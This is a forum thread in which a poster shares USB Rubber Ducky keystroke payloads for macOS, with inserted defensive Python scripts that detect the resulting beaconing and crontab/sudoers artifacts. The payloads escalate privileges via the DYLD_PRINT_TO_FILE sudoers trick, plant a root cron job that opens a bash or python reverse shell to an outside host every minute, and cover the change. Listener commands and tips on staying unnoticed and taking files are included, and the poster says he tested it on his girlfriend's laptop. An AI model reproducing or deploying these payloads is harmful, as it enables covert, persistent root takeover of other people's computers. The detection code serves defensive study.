[Payload] [Mac OS X] Simple persistent reverse bash


Matto

Hi! I'm new to the Rubber Ducky and to this community.

I've made a simple payload to create a reverse bash in an OS X target by using crontab.

I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session.

Anyway, this is my payload:

DELAY 2000
REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
COMMAND SPACE
DELAY 300
STRING Terminal
DELAY 300
ENTER
DELAY 700
COMMAND n
DELAY 500
REM --------------- ESCALATE PRIVILEGES ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
DELAY 200
REM --------------- RUN PAYLOAD ---------------
STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab -
ENTER
DELAY 200
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 200
REM --------------- CLOSE TERMINAL ---------------
STRING exit
ENTER
COMMAND Q

What this does is:

  1. Open the terminal
  2. Magically grant sudo privileges (many thanks to V3sth4cks153 for this)
  3. Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP)
  4. Remove the newly added privileges to the current user in /etc/sudoers
  5. Close the terminal app

The whole execution takes around 5 seconds.

So now, all we have to do in our attacking machine is:

sudo nc -l -p 443

We wait one minute (max) and we're in with root privileges :ph34r:

Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it.

Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want.

I just tested it on my girlfriend's MacBook Air and it works flawlessly.

One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this?

Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect.

Hope you like it!


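The post above relies on cron firing the reverse shell every minute, which gives the outbound traffic a cadence far more regular than anything a person produces, whatever port it uses. As an added example (not Matto's code and not part of the thread), the Python script below flags that cadence in a constructed outbound-connection log; the log format, process names and addresses are all made up for the example.

```python
"""Flag the reconnect cadence this thread relies on: a process that opens a
connection to the same host:port at a fixed interval (every 60 s from cron
here) is far more regular than normal user traffic. Added example, not the
poster's code; the log format, process names and addresses are constructed."""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple, Tuple

# Constructed outbound-connection records in a simple one-line format; any
# endpoint agent or egress firewall log can be mapped onto these three fields.
SAMPLE_LOG = """\
2016-05-01T10:00:01Z proc=bash   dst=203.0.113.10:443
2016-05-01T10:00:04Z proc=Safari dst=198.51.100.7:443
2016-05-01T10:01:01Z proc=bash   dst=203.0.113.10:443
2016-05-01T10:01:37Z proc=Safari dst=198.51.100.7:443
2016-05-01T10:02:02Z proc=bash   dst=203.0.113.10:443
2016-05-01T10:02:20Z proc=curl   dst=198.51.100.9:80
2016-05-01T10:03:01Z proc=bash   dst=203.0.113.10:443
2016-05-01T10:03:55Z proc=Safari dst=198.51.100.7:443
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+proc=(?P<proc>\S+)\s+dst=(?P<dst>\S+)$")


class Beacon(NamedTuple):
    proc: str
    dst: str
    count: int
    period: float   # mean seconds between consecutive connections
    jitter: float   # population standard deviation of those gaps


def parse_events(log_text: str) -> Dict[Tuple[str, str], List[datetime]]:
    """Group connection timestamps by (process, destination)."""
    groups: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue            # ignore lines that do not fit the format
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        groups[(m["proc"], m["dst"])].append(ts)
    return groups


def find_periodic_beacons(log_text: str, min_count: int = 3,
                          max_jitter: float = 5.0) -> List[Beacon]:
    """Return (process, destination) pairs seen at least min_count times with
    nearly constant spacing. A cron job firing every minute shows up with a
    period of about 60 s and a jitter of a second or two; interactive
    browsing does not."""
    beacons = []
    for (proc, dst), times in parse_events(log_text).items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period, jitter = statistics.mean(gaps), statistics.pstdev(gaps)
        if jitter <= max_jitter:
            beacons.append(Beacon(proc, dst, len(times), period, jitter))
    return beacons


if __name__ == "__main__":
    for b in find_periodic_beacons(SAMPLE_LOG):
        print(f"{b.proc} -> {b.dst}: {b.count} connections every "
              f"~{b.period:.0f}s (jitter {b.jitter:.1f}s)")
```

On the constructed log only the cron-spawned `bash` connections to port 443 are flagged; Safari's three visits to the same site are too irregular and the single `curl` never reaches `min_count`. The second signal worth keeping in mind is the process name itself: a shell, not a browser, repeatedly opening connections to a TLS port is unusual on its own, and a failed attempt while the listener is down still leaves one record per minute.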
Hi! That looks really good! I think that maybe the scripts you saw use plists for hiding purposes? But even using crontab I think is covert enough for the average Mac user not to notice it.

The problem you have may be caused by the encoding of your payload... I had some problems with language properties... For example, encoding a payload with the Swiss layout sometimes caused some special characters (<, >, and some other ones) to be swapped, but it never happened with the arrow keys. What keyboard layout are you using?


Thanks!

The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab.

Yes, this makes it difficult to find, especially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :)

Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky).

When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano since when I open any file, I can't use the arrows to move around (weird symbols appear instead).

Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write:

ftp myserver.com

And instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost.

Maybe it's a netcat limitation to send some output and special keys (as the arrows) through the connection?

Do you know any way around this? I know setting an SSH server in the victim would be the best solution, but then the port 22 should be open in his router and pointing to his IP address...

I'm not sure if I'm making myself clear. I'm sorry, English is not my native language :)

Thanks!


Oh! I understand! So it's not a question of being more discreet then...

For your problem with the arrow keys, I think it might be a NetCat issue, but I really don't know how to get around it...

Don't worry, you're making yourself perfectly clear. At least for me, even if English is not my native language as well! :)

Edited by V3sth4cks153

Good news!!

I've been searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected.

Then I found a way better alternative to the payload that uses python to create the reverse shell and socat instead of netcat to listen for the connection.

This is the Ducky payload:

DELAY 2000
REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
COMMAND SPACE
DELAY 200
STRING Terminal
DELAY 200
ENTER
DELAY 500
COMMAND n
DELAY 300
REM --------------- ESCALATE PRIVILEGES ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
DELAY 100
REM --------------- RUN PAYLOAD ---------------
STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab -
ENTER
DELAY 100
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 100
REM --------------- CLOSE TERMINAL ---------------
STRING exit
ENTER
DELAY 100
COMMAND w
DELAY 100
COMMAND q

And in your server, to listen for the connection you have to run:

sudo socat `tty`,raw,echo=0 tcp-listen:443

NOTE: Most likely you don't have socat installed, but you can install it very easily via apt-get (if your server is a Debian-based Linux; I'm not sure if it's available in OS X via Homebrew).

This method has a longer command to execute and is not as «elegant» as the previous, but it solves ALL of the problems, and when I say all, I mean that even the autocomplete with the TAB key works perfectly. It's just the same behaviour as an SSH connection. You can also press «Ctrl + C» and you won't drop the connection, it's going to send that command to the victim as expected :)

To exit, just press «Ctrl + D».

Same as before, it will try to reconnect every 60 seconds.

I hope this helps. I've tested it and it works like a charm.


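Both payloads in this thread, the bash `/dev/tcp` version in the first post and the python `pty.spawn` version above, leave the same two host artifacts: a job in root's crontab that binds a shell to a network socket, and (briefly, until the `ed '$d'` step deletes it again) a `NOPASSWD:ALL` line appended to `/etc/sudoers`. The `DYLD_PRINT_TO_FILE` escalation they depend on was a dyld bug in OS X 10.10 that Apple fixed in 10.10.5, so the durable thing to look for on a patched machine is the crontab. As an added example (not the poster's code), the Python script below audits both artifacts; the crontab and sudoers texts are constructed samples, and the indicator names are labels of my own.

```python
"""Audit the two artifacts the payloads in this thread leave behind: a reverse
shell scheduled in root's crontab (the bash /dev/tcp variant and the python
socket/pty variant) and a NOPASSWD:ALL line in /etc/sudoers. Added example,
not the poster's code; the crontab and sudoers texts are constructed samples."""
import re
from typing import Dict, FrozenSet, List, NamedTuple, Optional, Tuple

# Substrings that only appear in a cron command when it binds a shell to a
# network socket. The names are our own labels for the report.
REVERSE_SHELL_INDICATORS: Dict[str, re.Pattern] = {
    "bash-dev-tcp": re.compile(r"/dev/tcp/"),          # bash network redirection
    "interactive-bash": re.compile(r"\bbash\s+-i\b"),  # interactive shell on a socket
    "python-socket": re.compile(r"socket\.socket\("),  # python creates a socket
    "python-pty": re.compile(r"pty\.spawn\("),         # python allocates a pty on it
    "fd-dup-to-socket": re.compile(r"os\.dup2\("),     # stdio duplicated onto the socket
}

# Passwordless full sudo for one user or %group, e.g. "alice ALL=(ALL) NOPASSWD:ALL".
NOPASSWD_ALL_RE = re.compile(
    r"^(?P<who>%?\S+)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s*NOPASSWD:\s*ALL$")


class CronHit(NamedTuple):
    schedule: str
    command: str
    reasons: List[str]


def _split_cron_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a crontab job line, or None if it is not one."""
    if line.startswith("@"):                # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)             # five time fields, then the command
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None


def find_suspicious_cron_entries(crontab_text: str) -> List[CronHit]:
    """Flag crontab jobs whose command matches a reverse-shell indicator."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        job = _split_cron_line(line)
        if job is None:
            continue                        # env assignments, blank fields, etc.
        schedule, command = job
        reasons = [name for name, rx in REVERSE_SHELL_INDICATORS.items()
                   if rx.search(command)]
        if reasons:
            hits.append(CronHit(schedule, command, reasons))
    return hits


def find_nopasswd_sudoers(sudoers_text: str,
                          allowed: FrozenSet[str] = frozenset()) -> List[str]:
    """Return users/groups given NOPASSWD:ALL that are not on the expected allow-list."""
    found = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = NOPASSWD_ALL_RE.match(line)
        if m and m["who"] not in allowed:
            found.append(m["who"])
    return found


# Constructed sample of `sudo crontab -l` output on an affected machine.
SAMPLE_ROOT_CRONTAB = """\
0 3 * * * /usr/sbin/periodic daily
* * * * * bash -i >& /dev/tcp/attacker.example/443 0>&1
* * * * * python -c "import sys,socket,os,pty; s=socket.socket(); s.connect(('attacker.example',443)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')"
"""

# Constructed sample of /etc/sudoers during the window before the payload
# deletes the appended line again.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
alice ALL=(ALL) NOPASSWD:ALL
"""

if __name__ == "__main__":
    for hit in find_suspicious_cron_entries(SAMPLE_ROOT_CRONTAB):
        print(f"[cron] {hit.schedule}  {', '.join(hit.reasons)}\n       {hit.command}")
    for who in find_nopasswd_sudoers(SAMPLE_SUDOERS):
        print(f"[sudoers] unexpected NOPASSWD:ALL for {who}")
```

To run it against a real machine, feed `sudo crontab -l` and `/etc/sudoers` (plus anything in `/etc/sudoers.d`) into the two functions; the point the poster makes about the job being invisible in the user's own `crontab -l` is exactly why the audit has to read root's crontab, not the current user's.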
That's so cool! Really well done! I'll test it first thing tomorrow!


Nice! Let me know how it went :)

I tried the first payload, which uses the bash reverse shell, and it worked without any problem on my Mac! I'll try it on other Macs tomorrow, and let you know how this goes...

However, when trying to use the second one, which uses python, I was blocked because it uses some backslashes... I tried modifying the keyboard properties, but as I just posted here: https://forums.hak5.org/index.php?/topic/36433-multiple-modifier-keys-in-keyboard-layout/, I can't get it to work... Do you know how to use more than one modifier key in the properties file?

Edited by V3sth4cks153

Oops, you got me there.

I managed to make a proper layout for my keyboard using other languages as reference, but it was all trial and error.

The backslash was one of the keys that was not working correctly, so I had to fix it.

I'm not sure if it will help, but these are the changes I made:

https://forums.hak5.org/index.php?/topic/36068-keyboard-layout-modified-spanish-keyboard-layout/
